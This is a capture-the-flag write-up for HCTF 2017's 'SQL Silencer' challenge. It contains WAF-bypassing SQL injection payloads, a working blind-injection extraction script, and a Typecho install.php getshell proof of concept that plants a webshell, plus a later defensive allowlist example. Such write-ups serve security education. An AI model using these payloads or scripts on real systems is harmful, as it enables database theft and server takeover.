SQL Silencer
There were some decoy filters; simplified, here is the code for the part that matters most for the injection:

```php
function sql_check($sql){
    // id must be one of the three users (loose comparison, so a leading digit is enough)
    if($sql < 1 || $sql > 3){
        die('We only have 3 users.');
    }
    // Blacklist of keywords and characters; the union/select/from rule needs all three in order
    $check = preg_match('/&|_|\+|or|,|and| |\|\||#|-|`|;|"|\'|\*|into|union([\s\S]+)select([\s\S]+)from/i', $sql);
    if( $check ){
        die("Nonono!");
    } else {
        return $sql;
    }
}
```
This challenge can actually be solved with a displayed (union-based) injection; anyone interested can try that first.
However, because the blacklist is incomplete, almost every team solved it with a blind injection.
The database has two tables, `user` and `flag`.
The `user` table holds 3 rows, and the `flag` table holds 2 rows.
So when some teams tested `select(flag)from(flag)` in a subquery and got "there is nothing" back, they suspected the flag table did not exist,
whereas the database was actually raising an error: `ERROR 1242 (21000): Subquery returns more than 1 row`.
Let's start with the blind injection. Since most functions were not disabled, there are many ways to do it; here is one picked at random.
Since 3^1=2 -> Bob, 3^2=1 -> Alice, and 3^0 -> Cc,
check how many rows the flag table has:
`id=3^(select(count(flag))from(flag))`
It returns Alice, confirming the flag table has only 2 rows.
PoC for dumping the flag:
`id=3^(select(count(1))from(flag)where(binary(flag)<0x30))`
Write a script to run it and you get a directory name. The first row in the flag table is useless, which caused the players some trouble; sorry about that.
```python
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author = 'c014'
import requests

s = requests.session()
flag = ""
for i in range(100):
    for j in range(33, 128):
        # Count the flag rows that sort below the guessed prefix and XOR the count into id:
        # count 0 -> 3^0 -> Cc, count 1 -> 3^1 -> Bob, count 2 -> 3^2 -> Alice
        url = ("http://sqls.2017.hctf.io/inde/index.php?id=3^(select(count(1))from(flag)"
               "where(binary(flag)<0x{}))").format((flag + chr(j)).encode().hex())
        r = s.get(url)
        if 'Cc' not in r.text:
            # The first guess that makes the count non-zero is one past the real character
            flag = flag + chr(j - 1)
            print('[+]flag:' + flag)
            break
```
After extracting the directory './H3llo_111y_Fr13nds_w3lc0me_t0_hctf2017/' and visiting /index/H3llo_111y_Fr13nds_w3lc0me_t0_hctf2017/index.php, you find it is running Typecho.
The Typecho front-end getshell vulnerability from a while back can be used directly.
There are two approaches: one echoes the command execution output directly, the other uploads a shell.
Since the web root is usually not writable, I prepared an uploads directory, which also has a .DS_Store leak.
The PoC for the direct approach is:
Url: http://sqls.2017.hctf.io/index/H3llo_111y_Fr13nds_w3lc0me_t0_hctf2017/install.php?finish
Post: __typecho_config=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
Referer: http://sqls.2017.hctf.io/index/H3llo_111y_Fr13nds_w3lc0me_t0_hctf2017/install.php?finish=
Modify the base64 content as needed.
The PoC for uploading a shell is:
Url: http://sqls.2017.hctf.io/index/H3llo_111y_Fr13nds_w3lc0me_t0_hctf2017/install.php?finish
Cookie: __typecho_config=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
Referer: http://sqls.2017.hctf.io/index/H3llo_111y_Fr13nds_w3lc0me_t0_hctf2017/install.php
This creates a webshell named c014.php in the uploads directory.
Afterwards you will notice that the command execution functions seem to produce no output, because I disabled essentially all of them.
So use PHP's built-in directory listing instead:

```php
// Enumerate the entries directly under the filesystem root
$c = new DirectoryIterator("glob:///*");
foreach($c as $cc) {
    echo $cc, "</br>";
}
```
You will find a folder /flag_is_here in the root directory.
Then read the contents of that folder; there is a flag file:
`echo file_get_contents('/flag_is_here/flag');`
get flag~
Originally I intended this challenge to test bypassing the WAF rule `/union([\s\S]+)select([\s\S]+)from/i` with a displayed injection.
Here is the displayed-injection PoC I expected: `id=1=2|@c:=(select(1))union(select@c)`
The exp for reading the directory is: `id=1=2|@c:=(select(flag)from(flag)where(flag<0x30))union(select@c)`
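As an added illustration (not part of the original writeup), the Python below transcribes the `sql_check()` blacklist and contrasts it with a positive allowlist: the payloads quoted above pass the blacklist untouched, while `^[1-3]$` plus a parameterised query leaves nothing to inject. The payload strings, the `id` range and the user names come from the page; the function names, the allowlist and the in-memory SQLite copy of the `user` table are my own constructions.

```python
import re
import sqlite3

# The challenge's blacklist, transcribed from sql_check(). Note what it never
# mentions: '^', '(', ')', '=', a single '|', '@', ':=' and 'select'/'from'
# outside the union...select...from sequence. In PHP 5/7 the range check
# `$sql < 1 || $sql > 3` also passes "3^(...)", since the loose comparison
# reads the leading '3' as the number 3.
BLACKLIST = re.compile(
    r"&|_|\+|or|,|and| |\|\||#|-|`|;|\"|'|\*|into|union([\s\S]+)select([\s\S]+)from",
    re.IGNORECASE,
)


def blacklist_allows(value):
    """Mirror of sql_check(): True means the value would reach the SQL query."""
    return BLACKLIST.search(value) is None


def allowlist_allows(value):
    """Positive validation: only the literal ids 1, 2 and 3 are accepted."""
    return re.fullmatch(r"[1-3]", value) is not None


def lookup_user(value):
    """Allowlist plus a parameterised query against a constructed copy of the
    challenge's user table (ids and names as stated in the writeup)."""
    if not allowlist_allows(value):
        return None
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?)",
                     [(1, "Alice"), (2, "Bob"), (3, "Cc")])
    row = conn.execute("SELECT name FROM user WHERE id = ?", (int(value),)).fetchone()
    conn.close()
    return row[0] if row else None


if __name__ == "__main__":
    # Inputs taken from the writeup: one honest id, one naive injection the
    # blacklist catches, and the two payloads the page shows slipping through.
    for p in ["2", "1 or 1=1", "3^(select(count(flag))from(flag))",
              "1=2|@c:=(select(1))union(select@c)"]:
        print(repr(p), "blacklist:", blacklist_allows(p),
              "allowlist:", allowlist_allows(p), "user:", lookup_user(p))
```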
2017HCTF-Writeup